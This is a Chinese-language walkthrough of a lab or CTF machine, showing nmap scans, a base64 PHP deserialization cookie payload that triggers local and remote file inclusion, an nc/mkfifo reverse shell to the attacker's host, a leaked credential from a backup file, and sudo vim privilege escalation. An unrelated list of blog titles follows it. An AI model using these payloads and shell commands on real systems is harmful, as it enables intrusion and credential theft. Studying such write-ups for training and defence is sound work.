0x01 扫描存活,端口

C:\Users\Administrator>nmap -sn -PR -T 4 192.168.18.0/24

Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-16 16:00 ?D1ú±ê×?ê±??

Nmap scan report for 192.168.18.254

Host is up (0.00s latency).

MAC Address: 00:50:56:F5:8E:EC (VMware)

Nmap scan report for 192.168.18.1

Host is up.

Nmap scan report for 192.168.18.128

Host is up (0.0010s latency).

MAC Address: 00:0C:29:6B:45:F3 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 29.30 seconds

C:\Users\Administrator>nmap 192.168.18.128

Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-16 16:00 ?D1ú±ê×?ê±??

Nmap scan report for 192.168.18.128

Host is up (0.00s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE

22/tcp open  ssh

80/tcp open  http

MAC Address: 00:0C:29:6B:45:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.34 seconds

0x02 Web

Request:

GET / HTTP/1.1

Host: 192.168.18.128

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Cookie: user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0%3D

Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK

Date: Wed, 16 Sep 2020 08:04:41 GMT

Server: Apache/2.4.38 (Ubuntu)

Content-Length: 52

Connection: close

Content-Type: text/html; charset=UTF-8

Hello sk4This is a beta test for new cookie handler

可以看到cookie里面user值为一个base64加密,解密一下

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}

这里改为

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:7:"Welcome":0:{}}

试试

C:\Users\Administrator>python

Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32

Type "help", "copyright", "credits" or "license" for more information.

>>> import base64

>>> s = base64.b64encode(b'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:7:"Welcome":0:{}}')

>>> print(s)

b'Tzo0OiJVc2VyIjoyOntzOjEwOiIgVXNlciBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IiBVc2VyIHdlbCI7Tzo3OiJXZWxjb21lIjowOnt9fQ=='

>>>

返回为500,把空格替换为\x00试试

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7Tzo3OiJXZWxjb21lIjowOnt9fQ==

0x03 代码审计

确实ok但是没啥用继续扫下目录,得到一个backup目录为网站备份文件

index.php

<?php

	include("user.class.php");

	if(!isset($_COOKIE['user'])) {

		setcookie("user", base64_encode(serialize(new User('sk4'))));

	} else {

		unserialize(base64_decode($_COOKIE['user']));

	}

	echo "This is a beta test for new cookie handler\n";

?>

user.class.php

<?php

  include("log.class.php");

  class Welcome {

    public function handler($val) {

      echo "Hello " . $val;

    }

  }

  class User {

    private $name;

    private $wel;

    function __construct($name) {

      $this->name = $name;

      $this->wel = new Welcome();

    }

    function __destruct() {

      //echo "bye\n";

      $this->wel->handler($this->name);

    }

  }

?>

log.class.php

<?php

  class Log {

    private $type_log;

    function __costruct($hnd) {

      $this->$type_log = $hnd;

    }

    public function handler($val) {

      include($this->type_log);

      echo "LOG: " . $val;

    }

  }

?>

看到index.php可以看到new了一个user对象,然后通过序列化加base64加密

转到user.class.php

因为new了一个对象所以执行construct(),然后destruct()的时候调用handler方法输出sk4

转到log.class.php,可以很明确的看到有个文件包含

这里构造payload就很简单了

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

但是这里的空格用\x00转义一下然后同理bs4转码

>>> s = base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')

>>> print(s)

b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ=='

>>>

0x04 getshell

远程包含我们本地的1.txt,内容为

>>> base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.18.1/1.txt";}}')

b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjE4LjEvMS50eHQiO319'

>>>

返回反弹shell

GET /?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.18.129+7777+>/tmp/f HTTP/1.1

Host: 192.168.18.128

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Cookie: user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjE4LjEvMS50eHQiO319

Upgrade-Insecure-Requests: 1

Content-Length: 0

0x05 提权

$ cd /

$ ls

bin

boot

cdrom

credentials.txt.bak

dev

etc

home

initrd.img

initrd.img.old

lib

lib32

lib64

libx32

lost+found

media

mnt

opt

proc

root

run

sbin

snap

srv

swapfile

sys

tmp

usr

var

vmlinuz

vmlinuz.old

$ cat credentials.txt.bak

sk4:KywZmnPWW6tTbW5w

$

在根目录下发现敏感文件得到密码

ssh登录成功

sk4@sk4-VM:~$ id

uid=1000(sk4) gid=1000(sk4) groups=1000(sk4),24(cdrom),30(dip),46(plugdev),118(lpadmin),129(sambashare)

sk4@sk4-VM:~$ uname -a

Linux sk4-VM 5.0.0-25-generic #26-Ubuntu SMP Thu Aug 1 12:04:58 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

sk4@sk4-VM:~$ cat /etc/issue

Ubuntu 19.04 \n \l

sudo -l发现vim可以任意用户使用nopasswd

sk4@sk4-VM:~$ sudo -l

Matching Defaults entries for sk4 on sk4-VM:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sk4 may run the following commands on sk4-VM:

    (ALL) NOPASSWD: /usr/bin/vim

执行sudo vim

root@sk4-VM:~# id

uid=0(root) gid=0(root) groups=0(root)

root@sk4-VM:~#

php反序列化到getshell的更多相关文章

  1. weblogic 反序列化漏洞 getshell

    上传cmd.jsp,效果: 上传马:

  2. 每天复现一个漏洞--vulhub

    phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) 漏洞原理:http://www.polaris-lab.com/index.php/ar ...

  3. vulstack红队评估(二)

    一.环境搭建: 1.根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX     2.网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相 ...

  4. [BUUOJ记录] [GYCTF]EasyThinking

    主要考察ThinkPHP6.0的一个任意文件写入的CVE以及突破disable_function的方法. ThinkPHP6.0.0任意文件操作漏洞 理论分析 进入题目是一个简单的操作页面,dirma ...

  5. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  6. [php代码审计] Typecho 1.1 -反序列化Cookie数据进行前台Getshell

    环境搭建 源码下载:https://github.com/typecho/typecho/archive/v1.1-15.5.12-beta.zip 下载后部署到web根目录,然后进行安装即可,其中注 ...

  7. 【原创】Weblogic 反序列化远程命令执行漏洞GetShell&Cmd Exploit

    这工具写到半夜四点,做个记录. 已发布至freebuf,链接:http://www.freebuf.com/vuls/90802.html

  8. 【实战】Weblogic反序列化Getshell

    修仙就是干,直接操作起来 1.访问http://x.x.x.x:7001/wls-wsat/CoordinatorPortType 2.加入Content-Type:text/xml 3.在body中 ...

  9. 【实战】JBOSS反序列化Getshell

    一.JBOSS4.0.5_GA,5.x,6.x 需要JavaDeserH2HC(https://github.com/joaomatosf/JavaDeserH2HC) 操作起来 javac -cp ...

随机推荐

  1. J20航模遥控器开源项目系列教程(一)制作教程 | 基础版V1.0发布,从0到1

    我们的开源宗旨:自由 协调 开放 合作 共享 拥抱开源,丰富国内开源生态,开展多人运动,欢迎加入我们哈~ 和一群志同道合的人,做自己所热爱的事! 项目开源地址:https://github.com/C ...

  2. Quartz:基本用法总结

    OpenSymphony所提供的Quartz是任务调度领域享誉盛名的开源框架.Spring提供了集成Quartz的功能,可以让开发人员以更面向Spring的方式创建基于Quartz的任务调度应用.任务 ...

  3. 你还在用a标签吗?——用button替代a

    前言:a标签,不止你在用,我也在用.但某些时候我们可以考虑用button替代a. 在多页应用中,a标签很常见,我们常用来作为一个普通超链接,进行页面跳转. 而在单页应用中,我们使用路由进行页面切换,a ...

  4. Elementor如何隐藏页面上的标题(2种办法)

    原文首发于:https://loyseo.com/how-to-hide-page-title-in-elementor/ 本文介绍两种隐藏Elementor页面默认标题的方法,一种是单个隐藏,一种是 ...

  5. 力扣Leetcode 33. 搜索旋转排序数组

    33. 搜索旋转排序数组 假设按照升序排序的数组在预先未知的某个点上进行了旋转. ( 例如,数组 [0,1,2,4,5,6,7] 可能变为 [4,5,6,7,0,1,2] ). 搜索一个给定的目标值, ...

  6. Babel知识点相关

    本篇是根据最新babel 7版本写的,里面用到的一些babel相关包都是babel 7的     1,babel是如何工作的 babel是一个转译器,这里我严格区分了转译器和编译器,因为编译器最终生成 ...

  7. Android开发java开发之常用英文词汇汇总。程序员必备英语单词

    ANR  (Application Not Response )  bundle 捆, entire 整个的,完整的 lifetime 生命周期 entire lifetime 完整生命周期 visi ...

  8. 2019HNCPC C Distinct Substrings 后缀自动机

    题意 给定一个长度为n字符串,字符集大小为m(1<=n,m<=1e6),求\(\bigoplus_{c = 1}^{m}\left(h(c) \cdot 3^c \bmod (10^9+7 ...

  9. Oracle错误 ora-12514 解决方法-九五小庞

    成功连到数据库上之后,查看listener状态:lsnrctl status status READY 状态,需要由非归档转为归档模式,故操作如下: 1.关闭数据库shutdown immediate ...

  10. webpack3.10.0(入门系列基本概念1)

    一.概念 webpack的核心是一个用于现代JavaScript应用程序的静态模块打包程序.当webpack处理您的应用程序时,它会递归地构建一个依赖图,其中包含应用程序所需的每个模块,然后将所有这些 ...